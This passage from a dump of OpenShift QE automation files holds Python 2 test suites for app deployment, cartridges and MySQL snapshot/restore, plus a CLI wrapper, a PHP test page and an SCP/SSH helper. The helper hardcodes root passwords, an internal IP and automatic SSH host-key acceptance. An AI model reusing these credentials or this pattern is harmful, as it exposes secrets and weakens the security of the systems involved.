run_cli_wrapper(argv, wrappedclass=Shell, cliclass=GenericCLI, theme=None):\n\t\"\"\"Instantiate a class object (the wrappedclass), and run a CLI wrapper on it.\"\"\"\n\timport getopt\n\tlogfile = sourcefile = None\n\tpaged = False\n\ttry:\n\t\toptlist, args = getopt.getopt(argv[1:], \"?hgl:s:\", [\"help\", \"logfile=\", \"script=\"])\n\texcept getopt.GetoptError:\n\t\tprint wrappedclass.__doc__\n\t\treturn\n\tfor opt, val in optlist:\n\t\tif opt in (\"-?\", \"-h\", \"--help\"):\n\t\t\tprint run_cli_wrapper.__doc__\n\t\t\treturn\n\t\telif opt == \"-s\" or opt == \"--script\":\n\t\t\tsourcefile = val\n\t\telif opt == \"-g\":\n\t\t\tpaged = True\n\t\telif opt == \"-l\" or opt == \"--logfile\":\n\t\t\tlogfile = file(val, \"w\")\n\tif args:\n\t\ttargs, kwargs = breakout_args(args)\n\telse:\n\t\ttargs, kwargs = (), {}\n\ttry:\n\t\tobj = apply(wrappedclass, targs, kwargs)\n\texcept (ValueError, TypeError):\n\t\tprint \"Bad parameters.\"\n\t\tprint wrappedclass.__doc__\n\t\treturn\n\tif paged:\n\t\tio = termtools.PagedIO()\n\telse:\n\t\tio = ConsoleIO()\n
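\t# Example invocations (a sketch; \"mycli.py\" is a hypothetical script name):\n\t#   python mycli.py -g          -> paged GenericCLI wrapped around Shell()\n\t#   python mycli.py -s cmds.cli -> feed the script \"cmds.cli\" to the wrapper\n\tui = UserInterface(io, None, theme)\n\tcmd = get_generic_cmd(obj, ui, cliclass)\n\tcmd._export(\"PS1\", \"%%I%s%%N(%s%s%s)> \" % (wrappedclass.__name__,\n\t\t\t\t\", \".join(map(repr, targs)), IF(kwargs, \", \", \"\"),\n\t\t\t\t\", \".join(map(lambda t: \"%s=%r\" % t, 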
kwargs.items()))) )\n\tcli = CommandParser(cmd, logfile)\n\tif sourcefile:\n\t\tcli.parse(sourcefile)\n\telse:\n\t\tcli.interact()\n\n\ndef run_cli(cmdclass, io, env=None, logfile=None, theme=None, historyfile=None):\n\tui = UserInterface(io, env, theme)\n\tcmd = cmdclass(ui)\n\tparser = CommandParser(cmd, logfile, historyfile)\n\tparser.interact()\n\ndef run_generic_cli(cmdclass=BaseCommands):\n\tenv = environ.Environ()\n\tenv.inherit()\n\tio = ConsoleIO()\n\trun_cli(cmdclass, io, env)\n\n# factory for Command classes. Returns a parser.\ndef get_cli(cmdclass, env=None, aliases=None, logfile=None, paged=False, theme=None, historyfile=None):\n\tif paged:\n\t\tio = termtools.PagedIO()\n\telse:\n\t\tio = ConsoleIO()\n\tui = UserInterface(io, env, theme)\n\tcmd = cmdclass(ui, aliases)\n\tparser = CommandParser(cmd, logfile, historyfile)\n\treturn parser\n\ndef get_terminal_ui(env=None, paged=False, theme=None):\n\tif paged:\n\t\tio = termtools.PagedIO()\n\telse:\n\t\tio = ConsoleIO()\n\treturn UserInterface(io, env, theme)\n\ndef get_ui(ioc=ConsoleIO, uic=UserInterface, themec=DefaultTheme, env=None):\n\tio = ioc()\n\ttheme = themec()\n\treturn uic(io, env, theme)\n\ndef get_key(fd):\n\tsavestate = termtools.tcgetattr(fd)\n\ttry:\n\t\ttermtools.setraw(fd)\n\t\treturn os.read(fd, 1)\n\tfinally:\n\t\ttermtools.tcsetattr(fd, termtools.TCSAFLUSH, savestate)\n\n\n#### self test\n\n# models a BaseCommands class, but only prints argv (used to test parser)\nclass _CmdTest(BaseCommands):\n\n\tdef __call__(self, argv):\n\t\tself._print(\"argv: \")\n\t\tself._print(str(argv))\n\t\tself._print(\"\\n\")\n\t\treturn 0\n\n\nif __name__ == \"__main__\":\n\tenv = environ.Environ()\n\tenv.inherit()\n\tio = ConsoleIO()\n\t#io = termtools.PagedIO()\n\tprint \"=======================\"\n\trun_cli(_CmdTest, io, env)\n\tprint \"=======================\"\n\tenv[\"PS1\"] = \"CLItest> \"\n\tui = UserInterface(io, env, DefaultTheme())\n\tcmd = BaseCommands(ui)\n\tcmd = cmd.clone(DictCLI)\n\tcmd._setup({\"testkey\":\"testvalue\"}, \"dicttest> \")\n\tparser = CommandParser(cmd)\n\tparser.interact()\n\n\n\tf = UserInterface(ConsoleIO(), env, DefaultTheme())\n\tprint f.format(\"%T %t\")\n\tprint f.format(\"%Ibright%N\")\n\n\tprint f.format(\"%rred%N\")\n\tprint f.format(\"%ggreen%N\")\n\tprint f.format(\"%yyellow%N\")\n\tprint f.format(\"%bblue%N\")\n\tprint f.format(\"%mmagenta%N\")\n\tprint f.format(\"%ccyan%N\")\n\tprint f.format(\"%wwhite%N\")\n\n\tprint f.format(\"%Rred%N\")\n\tprint f.format(\"%Ggreen%N\")\n\tprint f.format(\"%Yyellow%N\")\n\tprint f.format(\"%Bblue%N\")\n\tprint f.format(\"%Mmagenta%N\")\n\tprint f.format(\"%Ccyan%N\")\n\tprint f.format(\"%Wwhite%N\")\n\n\tprint f.format(\"%Ddefault%N\")\n\tprint f.format(\"wrapped%ntext\")\n\tprint f.format(\"%l tty %l\")\n\tprint f.format(\"%h hostname %h\")\n\tprint f.format(\"%u username %u\")\n\tprint f.format(\"%$ priv %$\")\n\tprint f.format(\"%d cwd %d\")\n\tprint f.format(\"%L SHLVL %L\")\n\tprint f.format(\"%{PS4}\")\n\n" }, { "alpha_fraction": 0.7101248502731323, "alphanum_fraction": 0.7239944338798523, "avg_line_length": 23.86206817626953, "blob_id": "3f44cc286d059419b4bb88d46acbfea14ecc2899", "content_id": "38f93600048bbe71f5ad50afe39bf3ddd0e15e92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 721, "license_type": "no_license", "max_line_length": 118, "num_lines": 29, "path": "/automation/open/testmodules/RT/hot_deploy/python_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", 
"src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nOct 24, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom python_without_jenkins import PythonHotDeployWithoutJenkins\n\nclass PythonScalingHotDeployWithoutJenkins(PythonHotDeployWithoutJenkins):\n \n def __init__(self, config):\n PythonHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2747][RT]Hot deployment support for scalable application - without Jenkins - python\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PythonScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6523382067680359, "alphanum_fraction": 0.6580066084861755, "avg_line_length": 49.404762268066406, "blob_id": "996580fdc345027d09a1fc8fdbb92dc90a7351d0", "content_id": "8940e033cc4d1ce3b776d345cd4a5ad93e4ccfb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2117, "license_type": "no_license", "max_line_length": 160, "num_lines": 42, "path": "/automation/open/testmodules/RT/client/data/snapshot_restore_mysql_data/index.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\necho \"Welcome~~~~~~~\\n\";\n$OPENSHIFT_MYSQL_DB_HOST = getenv(\"OPENSHIFT_MYSQL_DB_HOST\");\n$OPENSHIFT_MYSQL_DB_PORT= getenv(\"OPENSHIFT_MYSQL_DB_PORT\");\n$OPENSHIFT_MYSQL_DB_USERNAME= getenv(\"OPENSHIFT_MYSQL_DB_USERNAME\");\n$OPENSHIFT_MYSQL_DB_PASSWORD= getenv(\"OPENSHIFT_MYSQL_DB_PASSWORD\");\n$OPENSHIFT_APP_NAME= getenv(\"OPENSHIFT_APP_NAME\");\nif(!empty($_GET[\"action\"])) {\n $action_name = $_GET[\"action\"];\n if ($action_name == \"create\"){\n $con=mysql_connect($OPENSHIFT_MYSQL_DB_HOST.\":\".$OPENSHIFT_MYSQL_DB_PORT, $OPENSHIFT_MYSQL_DB_USERNAME, $OPENSHIFT_MYSQL_DB_PASSWORD) or die(mysql_error());\n mysql_select_db($OPENSHIFT_APP_NAME,$con);\n mysql_query(\"DROP TABLE IF EXISTS ucctalk\",$con);\n mysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\n mysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker1', 'title1')\",$con);\n $result=mysql_query(\"SELECT * FROM ucctalk\",$con);\n while($row=mysql_fetch_array($result)) {\n echo $row['speaker'],\", \",$row['title'],\"\\n\";\n }\n mysql_close($con);\n } elseif ($action_name == \"modify\") {\n $con=mysql_connect($OPENSHIFT_MYSQL_DB_HOST.\":\".$OPENSHIFT_MYSQL_DB_PORT, $OPENSHIFT_MYSQL_DB_USERNAME, $OPENSHIFT_MYSQL_DB_PASSWORD) or die(mysql_error());\n mysql_select_db($OPENSHIFT_APP_NAME,$con);\n mysql_query(\"DROP TABLE IF EXISTS ucctalk\",$con);\n mysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\n mysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('speaker2', 'title2')\",$con);\n $result=mysql_query(\"SELECT * FROM ucctalk\",$con);\n while($row=mysql_fetch_array($result)) {\n echo $row['speaker'],\", \",$row['title'],\"\\n\";\n }\n mysql_close($con);\n } \n}else {\n $con=mysql_connect($OPENSHIFT_MYSQL_DB_HOST.\":\".$OPENSHIFT_MYSQL_DB_PORT, $OPENSHIFT_MYSQL_DB_USERNAME, $OPENSHIFT_MYSQL_DB_PASSWORD) or die(mysql_error());\n mysql_select_db($OPENSHIFT_APP_NAME,$con);\n $result=mysql_query(\"SELECT * FROM ucctalk\",$con);\n while($row=mysql_fetch_array($result)) {\n echo $row['speaker'],\", \",$row['title'],\"\\n\";\n }\n mysql_close($con);\n}\n?>\n" }, { "alpha_fraction": 0.5818908214569092, "alphanum_fraction": 0.5920106768608093, 
"avg_line_length": 37.711341857910156, "blob_id": "29da3f09c11c8ab4802bc1fabdbafb7d09255b1c", "content_id": "d4c26c50ffa48765f0f8fe28dcc387d779deb122", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3755, "license_type": "no_license", "max_line_length": 136, "num_lines": 97, "path": "/automation/open/testmodules/RT/cartridge/add_modules_to_jboss_server.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US945][rhc-cartridge] Add modules to jboss server\nhttps://tcms.engineering.redhat.com/case/122489/\n\"\"\"\n\nimport os, sys\n# user defined packages\nimport testcase\nimport common\nimport OSConf\nimport rhtest\nimport openshift\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"Add modules to jboss server\"\n self.app_type = common.app_types[\"jbossas\"]\n self.app_name = \"jbossmodule\"\n\n self.steps_list = []\n common.env_setup()\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass AddModulesToJbossServer(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a jbossas-7 application\",\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0,\n expect_description=\"%s app should be created successfully\" %(self.app_name)))\n\n target_dir1 = \"%s/.openshift/config/modules/org/jboss/test/modules/main/\" %(self.app_name)\n target_dir2 = \"%s/src/main/webapp/WEB-INF/lib\" %(self.app_name)\n target_dir3 = \"%s/src/main/webapp\" %(self.app_name)\n source_file1 = \"%s/app_template/jboss_module/TestClass.jar\" %(WORK_DIR)\n source_file2 = \"%s/app_template/jboss_module/module.xml\" %(WORK_DIR)\n source_file3 = \"%s/app_template/jboss_module/test.jar\" %(WORK_DIR)\n source_file4 = \"%s/app_template/jboss_module/modules.jsp\" %(WORK_DIR)\n cmd = \"\"\"mkdir -p %s %s && \n cp %s %s %s && \n cp %s %s && \n cp %s %s\"\"\" %(target_dir1, target_dir2, \n source_file1, source_file2, target_dir1, \n source_file3, target_dir2, \n source_file4, target_dir3)\n self.steps_list.append(testcase.TestCaseStep(\"Add customized jboss module to app\",\n cmd,\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\"))\n\n self.steps_list.append(testcase.TestCaseStep(\"Do git commit\",\n \"cd %s && git add . 
&& git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\"))\n\n def get_app_url(self):\n def closure():\n return OSConf.get_app_url(self.app_name)+\"/modules.jsp\"\n return closure\n\n self.steps_list.append(testcase.TestCaseStep(\"Access jboss module page\",\n common.grep_web_page,\n function_parameters = [get_app_url(self), \n \"org.jboss.test.modules\", \"-H 'Pragma: no-cache'\", 3, 5],\n expect_return=0,\n expect_description=\"Access page successfully\"))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AddModulesToJbossServer)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6490066051483154, "alphanum_fraction": 0.6655629277229309, "avg_line_length": 26.454545974731445, "blob_id": "57e5cf3a40c981792d54e803069ec356753a6a04", "content_id": "f4ce7a87498b6c0e93a2f13309f57c27093e0710", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 604, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/automation/selenium2libraryext.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from robot.libraries.BuiltIn import BuiltIn\nfrom Selenium2Library.keywords.keywordgroup import KeywordGroup\n\n\ndef _get_s2l():\n return BuiltIn().get_library_instance('Selenium2Library')\n\n\nclass Selenium2LibraryExt(KeywordGroup):\n\n def _run_on_failure(self):\n # required for on failure in this class to work\n # - call Selenium2Library's on failure\n _get_s2l()._run_on_failure()\n\n def do_something(self):\n s2l = _get_s2l()\n webdriver = s2l._current_browser()\n webdriver.maximize_window()\n import time\n time.sleep(5)\n webdriver.close()\n" }, { "alpha_fraction": 0.561495304107666, "alphanum_fraction": 0.5835514068603516, "avg_line_length": 32.86075973510742, "blob_id": "99cadf896564c87f8282c1f82d29fb4594ab4a5b", "content_id": "08e66ff5b5cd1bd85657d08651d2139f27ce3e05", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2675, "license_type": "no_license", "max_line_length": 93, "num_lines": 79, "path": "/automation/open/lib/pscp.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import paramiko\nimport scp\nimport os\n\nclass Pscp(object):\n scp = None\n ssh = None\n host = None\n\n def __init__(self, host='openshift-mtv-01', port=22, user='root', password='redhat'):\n # make connection\n if host:\n self.host = host\n\n if self.host == '10.14.16.138':\n password = 'vostok08'\n\n t = paramiko.Transport((host, port))\n t.connect(username=user, password=password)\n \n scp_sess = scp.SCPClient(t)\n \n # now, do the actual bootstrap process\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(host, username=user, password=password)\n self.ssh = ssh\n self.scp = scp_sess \n\n def copy_from(self, src, dst='./'):\n \"\"\"\n Copy a dir/file from remote host to specified place\n \"\"\"\n if 
self.host != 'localhost':\n # don't need to do scp if we are already at localhost\n self.scp.get_r(src, dst)\n\n def copy_to(self, src, dst):\n remote_cmd = \"mkdir -p %s\" % dst\n #print remote_cmd\n stdin, stdout, stderr = self.ssh.exec_command(remote_cmd)\n #print stdout.readlines()\n #print stderr.readlines()\n if self.host != 'localhost':\n # don't need to do scp if we are already at localhost\n self.scp.put_r(src, dst)\n\n def copy_to_global_location(self, src, dst):\n \"\"\"\n copy the html log over to the global location\n \"\"\"\n # first make the top-level directory\n try:\n remote_cmd = \"mkdir -p %s\" % dst.rpartition(os.path.basename(dst))[0]\n except:\n #case, when dst ends with '/'\n remote_cmd = \"mkdir -p %s\" % dst\n print remote_cmd\n stdin, stdout, stderr = self.ssh.exec_command(remote_cmd)\n print stderr.readlines()\n remote_cmd = \"cp -pr %s %s\" % (src, dst)\n print remote_cmd\n stdin, stdout, stderr = self.ssh.exec_command(remote_cmd)\n print stderr.readlines()\n\n\n def __del__(self):\n self.ssh.close()\n\nif __name__ == '__main__':\n #myscp = Pscp(host='localhost', user='pruan', password='vostok08')\n myscp = Pscp(host='10.14.16.138', user='peter', password='vostok08')\n src = '/var/www/html/testresults/201206/25/Collections_Demo_Demo01-279-20120625155434'\n dst = '/automation_logs/OpenShift_QE/automation/testresults/201206/25'\n global_log_basepath = \"/automation_logs/OpenShift_QE/automation\"\n\n global_dst = global_log_basepath + src.split('/var/www/html')[1]\n print global_dst\n myscp.copy_to_global_location(src, global_dst)\n" }, { "alpha_fraction": 0.5323886871337891, "alphanum_fraction": 0.5373048186302185, "avg_line_length": 33.58000183105469, "blob_id": "5278b16ed191606b13b7d5179efcae2fd52992b0", "content_id": "02e0e694de3f7ea48f2d596c538e73273a976b5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3458, "license_type": "no_license", "max_line_length": 158, "num_lines": 100, "path": "/automation/open/testmodules/RT/client/rhc_wrapper.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport common\nimport rhtest\nimport re\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n CART_LIST = []\n BLACKLIST = (\"10gen\", \"rockmongo\", \"phpmyadmin\", \"phpmoadmin\", \"jenkins\")\n\n def initialize(self):\n self.info(\"[US1317][UI][CLI]rhc wrapper - rhc cartridge\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = common.getRandomString(10)\n self.actions = ['add', 'stop', 'status', 'start', 'restart', 'reload', 'remove']\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass RhcWrapper(OpenShiftTest):\n def gen_cartr_list(self):\n cmd = \"rhc cartridge list -l %s -p '%s' %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n (status, output) = common.cmd_get_status_output(cmd)\n\n self.assert_equal(status, 0, \"Unable to get list of cartridges\")\n self.assert_match(\"postgresql\", output, \"Missing postgresql support?\")\n self.assert_match(\"mysql\", output, \"Missing mysql support\")\n\n x = re.compile(r\"^(.*-\\d+\\.\\d+, .*-\\d+\\.\\d+, .*)$\", re.MULTILINE)\n obj = x.search(output)\n if (obj):\n self.CART_LIST=[]\n for i in obj.group(1).split(', '):\n print \"Appended %s\"%i\n self.CART_LIST.append(i)\n return 0\n\n def gen_function(self, action, cartridge, app_name):\n cmd = \"rhc 
cartridge %s %s -a %s -l %s -p '%s' %s \"%(action, cartridge, app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n if action == \"remove\":\n return cmd + \"--confirm\"\n else:\n return cmd\n\n def gen_steps(self, app_names):\n for app_name in app_names:\n print \"app_name:\",app_name\n for cartridge_name in self.CART_LIST:\n print \"cartridge_name:\",cartridge_name\n _x=None\n for black in self.BLACKLIST:\n if re.search(r\"%s\"%black,cartridge_name):\n _x=1\n break\n if _x==1:\n _x=None\n continue\n for action in self.actions:\n self.add_step(\"Execute '%s' with %s\"%(action, cartridge_name),\n self.gen_function(action, cartridge_name, app_name),\n expect_return = 0, try_count=3)\n\n def test_method(self):\n\n self.step(\"Get the list of supported cartridges\")\n self.assert_equal(0, self.gen_cartr_list())\n\n self.step(\"Create a test app\")\n self.assert_equal(0, common.create_app(self.app_name, \n common.app_types['php'], \n self.user_email, \n self.user_passwd, \n False))\n\n #let's generates steps for all cartridges and actions...\n self.gen_steps([self.app_name])\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcWrapper)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5996391773223877, "alphanum_fraction": 0.6035248637199402, "avg_line_length": 82.30635833740234, "blob_id": "5c86b11c459be48b84431ea232b0097e1fc6a878", "content_id": "e10b96fb3440de56adcaf7daacb8218cb626be2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14412, "license_type": "no_license", "max_line_length": 601, "num_lines": 173, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_big_mysql_data_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-24\n\n[rhc-cartridge]snapshot/restore big data to new app\nhttps://tcms.engineering.redhat.com/case/167902/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `php` as default\")\n self.test_variant = 'php'\n self.summary = \"[rhc-cartridge]snapshot/restore big mysql data to new app\"\n self.app_name = self.test_variant.split('-')[0] + \"bigmysql\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n self.record_count = 500000 # amount of records to be inserted\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -f %s*\" % (self.app_name))\n\n\nclass BigMysqlDataTest(OpenShiftTest):\n\n def test_method(self):\n self.step(\"Create %s app: %s\" % (self.app_type, self.app_name))\n ret = common.create_app(self.app_name, common.app_types[self.test_variant], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, 
\"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.app_url = OSConf.get_app_url(self.app_name)\n self.url_dict = { \"php\" : { \"insert\": \"%s/mysql.php?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql.php?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql.php?action=show\" % (self.app_url)},\n \"jbossas\": { \"insert\": \"%s/mysql.jsp?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql.jsp?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql.jsp?action=show\" % (self.app_url)},\n \"perl\" : { \"insert\": \"%s/mysql.pl?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql.pl?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql.pl?action=show\" % (self.app_url)},\n \"python\": { \"insert\": \"%s/insert?size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/delete\" % (self.app_url),\n \"show\" : \"%s/show\" % (self.app_url)},\n \"ruby\" : { \"insert\": \"%s/mysql?action=insert&size=%s\" % (self.app_url, self.record_count),\n \"delete\": \"%s/mysql?action=delete\" % (self.app_url),\n \"show\" : \"%s/mysql?action=show\" % (self.app_url)},\n }\n self.url_dict[\"jbosseap\"] = self.url_dict[\"jbossas\"]\n self.url_dict[\"ruby-1.9\"] = self.url_dict[\"ruby\"]\n\n self.step(\"Embed mysql to the app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to embed mysql to the app\")\n\n self.step(\"Copy sample app to git repo and git push\")\n self.mysql_user = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"username\"]\n self.mysql_passwd = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"password\"]\n self.mysql_dbname = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"database\"]\n self.mysql_host = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"url\"]\n self.mysql_port = OSConf.default.conf['apps'][self.app_name]['embed'][common.cartridge_types[\"mysql\"]][\"port\"]\n if self.test_variant in ('php'):\n cmd = \"cd '%s/php/' && cp -f '%s/app_template/bigdata/mysql/mysql.php' . && sed -i -e 's/#host/%s/g' mysql.php && sed -i -e 's/#port/%s/g' mysql.php && sed -i -e 's/#dbname/%s/g' mysql.php && sed -i -e 's/#user/%s/g' mysql.php && sed -i -e 's/#passwd/%s/g' mysql.php && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('jbossas', 'jbosseap'):\n cmd = \"cd '%s/src/main/webapp/' && cp -f '%s/app_template/bigdata/mysql/mysql.jsp' . && mkdir WEB-INF/lib && cp -f '%s/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar' WEB-INF/lib && sed -i -e 's/#host/%s/g' mysql.jsp && sed -i -e 's/#port/%s/g' mysql.jsp && sed -i -e 's/#dbname/%s/g' mysql.jsp && sed -i -e 's/#user/%s/g' mysql.jsp && sed -i -e 's/#passwd/%s/g' mysql.jsp && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('perl'):\n cmd = \"cd '%s/perl/' && cp -f '%s/app_template/bigdata/mysql/mysql.pl' . 
&& sed -i -e 's/#host/%s/g' mysql.pl && sed -i -e 's/#port/%s/g' mysql.pl && sed -i -e 's/#dbname/%s/g' mysql.pl && sed -i -e 's/#user/%s/g' mysql.pl && sed -i -e 's/#passwd/%s/g' mysql.pl && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('python'):\n cmd = \"cd '%s/wsgi/' && cp -f '%s/app_template/bigdata/mysql/application' . && sed -i -e 's/#host/%s/g' application && sed -i -e 's/#port/%s/g' application && sed -i -e 's/#dbname/%s/g' application && sed -i -e 's/#user/%s/g' application && sed -i -e 's/#passwd/%s/g' application && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n elif self.test_variant in ('ruby', 'ruby-1.9'):\n cmd = \"cd '%s/' && cp -f %s/app_template/bigdata/mysql/{config.ru,Gemfile} . ; bundle check ; bundle install ; sed -i -e 's/#host/%s/g' config.ru && sed -i -e 's/#port/%s/g' config.ru && sed -i -e 's/#dbname/%s/g' config.ru && sed -i -e 's/#user/%s/g' config.ru && sed -i -e 's/#passwd/%s/g' config.ru && git add . && git commit -amt && git push\" % (self.git_repo, OpenShiftTest.WORK_DIR, self.mysql_host, self.mysql_port, self.mysql_dbname, self.mysql_user, self.mysql_passwd)\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to copy sample app to local git repo and git push\")\n\n self.step(\"Wait for the app to become available\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, 'There is no record in database', \"-H 'Pragma: no-cache' -L\", 5, 6)\n self.assert_equal(ret, 0, \"The app doesn't become available in reasonable time\")\n\n self.step(\"Access the 'insert' page to insert a large amount of records into the mysql database\")\n self.info(\"This step may take a very long time\")\n url = self.url_dict[self.test_variant][\"insert\"]\n cmd = \"curl -H 'Pragma: no-cache' -L '%s'\" % (url)\n ret = common.command_get_status(cmd, timeout=-1)\n\n\ttime.sleep(280)\n self.step(\"Check mysql data exists\")\n url = self.url_dict[self.test_variant][\"show\"]\n ret = common.grep_web_page(url, [\"There are %s records in database\" % (self.record_count), \"This is testing data for testing snapshoting and restoring big data in mysql database\"],\n \"-H 'Pragma: no-cache' -L\", 5, 6, True)\n self.assert_equal(ret, 0, \"The MySQL data doesn't exist\")\n\n self.step(\"Take snapshot of the app\")\n self.info(\"This step may take a very long time. 
